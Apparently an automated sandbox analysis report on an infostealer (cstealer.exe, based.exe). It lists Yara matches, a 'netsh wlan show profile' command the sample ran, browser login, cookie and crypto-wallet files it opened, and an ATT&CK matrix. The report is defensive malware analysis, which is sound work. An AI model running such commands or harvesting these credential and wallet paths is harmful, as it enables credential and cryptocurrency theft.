                                Source: Yara matchFile source: 00000009.00000003.2294300603.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.2315471256.0000020102B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000003.2285580339.0000025416469000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2207767340.0000020102CDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000003.2219861394.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: cstealer.exe PID: 6608, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cstealer.exe PID: 3292, type: MEMORYSTR
                                Source: Yara matchFile source: 46.0.main.exe.16132da05b8.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.main.exe.16132c3ef04.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.main.exe.16132c30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000018.00000003.2310472358.000000000799E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000000.2340574067.0000016132C32000.00000002.00000001.01000000.0000005E.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                Source: Yara matchFile source: 46.0.main.exe.16132da05b8.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.main.exe.16132c3ef04.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.main.exe.16132c30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000018.00000003.2310472358.000000000799E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000000.2340574067.0000016132C32000.00000002.00000001.01000000.0000005E.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                Source: Yara matchFile source: 46.0.main.exe.16132da05b8.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.main.exe.16132c3ef04.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.main.exe.16132c30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000018.00000003.2310472358.000000000799E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000000.2340574067.0000016132C32000.00000002.00000001.01000000.0000005E.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: Yara match | File source: Process Memory Space: cstealer.exe PID: 6608, type: MEMORYSTR
                                Source: Yara match | File source: Process Memory Space: cstealer.exe PID: 3292, type: MEMORYSTR

                                Remote Access Functionality

                                Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\_MEI14722\rarreg.key, type: DROPPED
                                Source: Yara match | File source: Process Memory Space: cstealer.exe PID: 6608, type: MEMORYSTR
                                Source: Yara match | File source: Process Memory Space: cstealer.exe PID: 3292, type: MEMORYSTR
                                Source: Yara match | File source: C:\ProgramData\main.exe, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 9_2_00007FF8A8032B5D bind,WSAGetLastError,9_2_00007FF8A8032B5D
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 9_2_00007FF8B7E35260 PyEval_SaveThread,sqlite3_bind_parameter_count,PyEval_RestoreThread,PyLong_Type,PyFloat_Type,PyUnicode_Type,PyUnicode_AsUTF8AndSize,sqlite3_bind_text,PyLong_AsLongLongAndOverflow,sqlite3_bind_int64,Py_BuildValue,PyDict_GetItemWithError,_Py_Dealloc,PyErr_Occurred,_PyObject_LookupAttr,_PyObject_LookupAttr,PyLong_Type,PyFloat_Type,PyUnicode_Type,PyType_IsSubtype,PyObject_CheckBuffer,PyObject_GetBuffer,sqlite3_bind_blob,PyBuffer_Release,sqlite3_bind_null,PyFloat_AsDouble,sqlite3_bind_double,PyEval_SaveThread,sqlite3_bind_parameter_name,PyEval_RestoreThread,PyUnicode_FromString,PyDict_Type,PyDict_GetItemWithError,_Py_Dealloc,PyErr_Fetch,sqlite3_db_handle,_PyErr_ChainExceptions,PyList_GetItem,PyObject_CallOneArg,_Py_Dealloc,PyErr_Occurred,PyExc_OverflowError,PyErr_SetString,PyErr_Occurred,PyErr_Format,PyObject_CallOneArg,_Py_Dealloc,PyExc_TypeError,PyErr_ExceptionMatches,PyErr_Clear,PySequence_Check,PyErr_Fetch,sqlite3_db_handle,_PyErr_ChainExceptions,PySequence_Size,PyErr_Format,PyObject_GetItem,PyErr_Occurred,PyErr_Format,PyErr_Format,PyErr_SetString,PySequence_GetItem,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,PyExc_LookupError,PyErr_ExceptionMatches,_Py_Dealloc,PyObject_CallOneArg,_Py_Dealloc,_Py_Dealloc,PyExc_TypeError,PyErr_ExceptionMatches,PyErr_Clear,_Py_Dealloc,PyExc_OverflowError,PyErr_SetString,PyBuffer_Release,PyExc_OverflowError,PyErr_SetString,PyErr_Occurred,9_2_00007FF8B7E35260
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 9_2_00007FF8B7E36A54 PyFloat_Type,PyUnicode_AsUTF8AndSize,sqlite3_bind_text,PyObject_CheckBuffer,PyErr_Format,sqlite3_bind_null,PyObject_GetBuffer,PyExc_OverflowError,PyErr_SetString,PyBuffer_Release,sqlite3_bind_blob,PyBuffer_Release,PyExc_OverflowError,PyErr_SetString,PyFloat_AsDouble,PyErr_Occurred,sqlite3_bind_double,PyErr_Occurred,sqlite3_bind_int64,9_2_00007FF8B7E36A54
                                MITRE ATT&CK Matrix (a leading number on a technique is the report's superscript match count)

                                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                Gather Victim Identity Information | 1 Scripting | Valid Accounts | 341 Windows Management Instrumentation | 1 Scripting | 1 Abuse Elevation Control Mechanism | 41 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 Data Encrypted for Impact
                                Credentials | Domains | Default Accounts | 2 Native API | 11 DLL Side-Loading | 11 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 1 Credential API Hooking | 3 File and Directory Discovery | Remote Desktop Protocol | 2 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                                Email Addresses | DNS Server | Domain Accounts | 112 Command and Scripting Interpreter | 2 Registry Run Keys / Startup Folder | 311 Process Injection | 1 Abuse Elevation Control Mechanism | Security Account Manager | 47 System Information Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
                                Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | 2 Registry Run Keys / Startup Folder | 21 Obfuscated Files or Information | NTDS | 461 Security Software Discovery | Distributed Component Object Model | 1 Credential API Hooking | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 21 Software Packing | LSA Secrets | 2 Process Discovery | SSH | 1 Clipboard Data | 4 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Timestomp | Cached Domain Credentials | 351 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 DLL Side-Loading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 4 Rootkit | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Masquerading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 351 Virtualization/Sandbox Evasion | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
